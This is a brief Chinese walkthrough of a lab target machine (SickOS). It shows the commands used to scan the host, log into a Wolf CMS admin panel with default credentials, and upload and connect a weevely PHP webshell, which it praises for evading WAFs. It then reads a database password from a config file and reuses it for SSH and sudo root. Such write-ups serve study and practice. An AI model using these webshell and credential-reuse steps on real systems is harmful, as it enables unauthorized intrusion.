靶机:192.168.12.130
kali: 192.168.249.128
一、信息收集
nmap -sV 192.168.12.130
–扫描开放端口3128端口是作为代理
dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128
–扫下web目录扫到robots.txt
Wolf CMS后台管理:?/admin
一试就出来了–弱口令:admin/admin
weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。(又学到一个工具)
weevely generate 666 yasso.php
–密码666–上传–
weevely连接木马(需要开启代理)
export http_proxy=http://192.168.12.130:3128
–配置代理
打完靶机切记删除代理!!!
unset http_proxy
–删除代理
weevely http://192.168.12.130/wolfcms/public/yasso.php 666
–连接木马
二、提权
cd /var/www/wolfcms
–/var/www/wolfcms目录下面发现数据库配置文件
发现用户名/密码=root/john@123
貌似只允许本地连接cat /etc/passwd | grep /bin/bash
–查看当前用户
发现sickos用户
root数据库密码即sickos密码
ssh sickos@192.168.12.130
ssh连接
sudo su
–输入sickos密码
成功root
版权声明:本文为ZXT2804567059原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。